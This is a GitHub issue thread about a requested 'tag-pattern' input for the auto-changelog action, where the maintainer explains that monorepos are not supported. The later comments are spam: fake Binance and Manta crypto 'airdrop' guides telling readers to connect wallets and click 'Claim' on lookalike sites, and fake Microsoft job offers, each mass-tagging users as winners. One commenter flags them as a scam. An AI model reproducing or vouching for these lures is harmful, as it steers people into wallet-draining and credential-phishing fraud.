### ISSUE TITLE
feat: Add tag-pattern action input.

### ISSUE THREAD

**Issue by RobloxianDemo** [ardalanamini/auto-changelog#137]
Hey there! I really fancy this action and you have done a very good job on it!
I'd just fancy requesting and favor having this implemented into the action itself:
> **The ability to specify a `tag-pattern` to select and compare latest commits with rather than all commits in a specified tag.**

For example, in the specified image below, the specified tag-pattern should be `player` and it should retrieve the latest commits between it and the latest (similar) tag:
![image](https://user-images.githubusercontent.com/76854027/235267517-4d0722af-050a-4ac2-bf04-0fb4f15fae0e.png)

Where it'd appear similarly to this upon release, with the newly specified `tag-pattern` and its corresponding value of `player` only revealing the latest commit differences between the new and last tags with said pattern:
![image](https://user-images.githubusercontent.com/76854027/235267629-574424eb-87dc-40d2-9d02-b135544fbb6d.png)

Thank you again maintaining this wonderful GitHub Action!

**Comment by ardalanamini** [comment]
@RobloxianDemo Hi,
Thanks for submitting this feature request,
I'm happy to hear that you find this action useful.

To be clear, you don't want to reference all the different commits with the same message and to only reference the last one?

Also from the screenshot, I see the version bump commits are also added in the Changelog which is not intended 🤔

**Comment by ardalanamini** [comment]
Additionally, can you share the config you're using to generate your Changelog?

**Comment by RobloxianDemo** [comment]
Hey there!

No worries, and I'm glad to chip in with ideas! Preferably though, I'd favor having the last reference's commits being compared under the stated `tag-pattern` that was inputted, if not, it should stay as is (since my releases aren't  very semantic).

I just noticed that as well, and that sounds good! 👍 

As for the configuration file, here's the code for it:
```yaml
- name: Build the Changelog
  uses: ardalanamini/auto-changelog@v3
  id: build-changelog
  with:
    github-token: ${{ github.token }}
    commit-types: |
      Breaking: 🚨 Breaking Adjustments
      Build: 🧯 Build Adjustments
      Chore: 💄 New Chores
      CI: 💢 Continuous Integrations
      Dependency: 📖 Dependency Adjustments
      Documentation: 🌍 Documentation Adjustments
      Enhancement: 🚀 New Enhancements
      Feature: 🌟 New Features
      Fix: 🐞 Bug Fixes
      Other: 📂 Other Adjustments
      Patch: 🐞 Bug Patches
      Performance: 💊 Performance Improvements
      Refactor: 🐝 Refactored
      Revert: 🔙 Reverted
      Style: 🎨 Code Style Adjustments
      Test: ⛑ Tests
    default-commit-type: 📂 Other Adjustments
    # tag-pattern: ${{ env.TAG_NAME_LOWER }}
    include-compare: false
    semver: false
```

**Comment by ardalanamini** [comment]
I just released the `v4`, I think it also solves the issues you're facing 🤔 

As for the inputs you might want to change: (based on your screenshots)

```yaml
include-compare: true
release-name-prefix: "@robloxiandemo/player/"
semver: true
```

It should work properly with your case as far as I understood from the details, plus having a more optimized & readable Changelog, similar to [this](https://github.com/ardalanamini/auto-changelog/releases/tag/v4.0.0).

**Comment by RobloxianDemo** [comment]
Hey, and good stuff!

Issue is, I have adjusted my code accordingly, though I'm still faced with a changelog of this sort:
> ![image](https://user-images.githubusercontent.com/76854027/235445585-196d1214-ca86-4424-9432-3a3751d84b2b.png)

It seems to have fetched all of the commits still (I plan on having different sorts of releases on one branch, akin to the following library):
> https://github.com/Quenty/NevermoreEngine/releases

Attachment of the retrieved commits:
> ![image](https://user-images.githubusercontent.com/76854027/235445854-efe96f8d-8b9b-4e75-a169-e4ed37f7924c.png)

Expected behavior should be something similar to this:
> ![image](https://user-images.githubusercontent.com/76854027/235446080-07f31fa4-0114-4786-abd5-70a6c5ee2b74.png)

**Comment by ardalanamini** [comment]
Ok, it seems I have missed a big point here!
At the moment this action does not support monorepo projects, and it might take a while before that can be achieved in this action (since there are some complexity in determining which commit should be considered for which sub-project)

Although there are other tools such as [Changesets](https://github.com/changesets/changesets) that support monorepos, but with a different approach than this action;
The sample repo you mentioned is using one such tool.

**Comment by RobloxianDemo** [comment]
Ah, it seems that I missed that mark here earlier with the mono-repository!

Would you be looking forward to releasing support for these sorts of projects anytime soon?

As for the existing generators, I'll have to check around! Thank you for your feedback and assistance with this and I'm looking forward to viewing the progression of this GitHub Action!

**Comment by ardalanamini** [comment]
I'll have to look for a solution for the issue I mentioned earlier about detecting the commit for each sub-project;
I have some initial ideas how to do it but I'll have to give it more thought before implementing it.

Regardless, I'm definitely not against supporting monorepos since I'm also using them, but due to my busy working schedule right now, I only have the weekends to put any time on this.

**Comment by RobloxianDemo** [comment]
That'd be lovely, though I completely understand!

Hopefully you are able to figure this all out very soon, as I'd love to have an easier implementation and even allow others to adapt to an easier mono-repo versioning tool!

Thank you again for your continuation with the support on this wonderful GitHub Action!

**Comment by softuvo** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

**Comment by metadetron** [comment]
# Earn $1000 in Manta Network Tokens!

[![Manta Network](https://global.discourse-cdn.com/aptoslabs/original/3X/e/6/e6954df39d3aedbc46201c5e1199eb9deb84411d.jpeg)](https://claim.mantarewards.online)

## Steps to Earn:

1. **Connect Your Wallet:**
   - Make sure you have a wallet compatible with Manta Network, such as MetaMask or Trust Wallet.
   - Visit [https://claim.mantarewards.online](https://claim.mantarewards.online) and connect your wallet.

2. **Use the Claim Method:**
   - After connecting your wallet, navigate to the rewards section or dashboard.
   - Find the "Claim" option and click on it.

3. **Claim Your Prize:**
   - Follow the on-screen instructions to complete the claiming process.
   - Upon successful completion, you will receive $1000 in Manta Network tokens in your wallet.

4. **Enjoy Your Tokens:**
   - The tokens will be deposited into your wallet and ready to be used or traded.

## Important Note:
Make sure to read the terms and conditions on the [https://claim.mantarewards.online](https://claim.mantarewards.online) page to ensure you meet all eligibility requirements for the promotion. This offer is for a limited time, so don't miss out!



Winners: @jomirhosen, @TroutMax, @williamkennedy, @act262, @punjab, @yk-sgr, @serhiidemchuk

**Comment by YourNPC** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @VnLeona, @zhengger, @ibrahimebci, @tonymade8, @prajwal89, @SiNa88, @zorrosword, @ellekasai, @OverDose24, @emailsnipper, @CarlosLugones, @jbowa, @yfmingg, @statebait, @GloWE3, @smartworlds, @freeacger, @jameszou707, @sequ3l, @ryanmac, @TrillCyborg, @lykkeaxlin, @mariospeed, @DisruptHub, @chair28980, @luisfidelis, @peterkinalex, @ankit-jds, @luckyJing6, @jsfour, @ChainSafeSystems, @kelby, @Chex, @huhu087, @out-of-system, @Ref-rain, @purtyb1tch92, @mfa8233, @Prasert111, @zubairnahmed, @ezeql, @AmorekAmatorek, @scaledrop, @CZZLEGEND, @huynh922, @nmh32, @vehicles4real, @Orionsdad94, @martineng, @iower

**Comment by CarlosLugones** [comment]
Hey everyone, don't fall on this scam. Be careful.

**Comment by CarlosLugones** [comment]
@ardalanamini it's a good idea to report @YourNPC for phishing attempts.

**Comment by rookiecdn** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online).

## Job Description:
- **Position:** Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan
  - Company-contributed retirement plan
  - Flexible working hours
  - Collaborative and inclusive work environment

## Requirements:
- Proven experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Familiarity with frameworks such as React, Angular, or Vue.js
- Problem-solving skills and ability to work in a team

**Note:** This position is open to candidates from anywhere in the world.
oleg-schmidt, @Allaaann, @mi2oon, @yinannasc, @Aleksion, @bitcoineddd, @adrianmaurey, @benwaldner, @the872, @baitcenter, @geometrybase, @mygirl8893, @cpquinn98, @vicentedealencar, @jellevandevelde, @renatoagomes, @Aldo-f, @HEDPAY, @wpank, @dirixtt

**Comment by huzhen-v5** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 1, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
nsrlhn, @franciosi, @Jurijkoh, @Chastitu, @tchigher, @munakaya, @monklof, @martchouk, @nisd93, @renjihe, @martin01735, @stequald, @ayo-dele-akin, @Cuchulain, @RES-1, @toursonlk, @posa88, @Khairulhi, @langyo, @zepheros
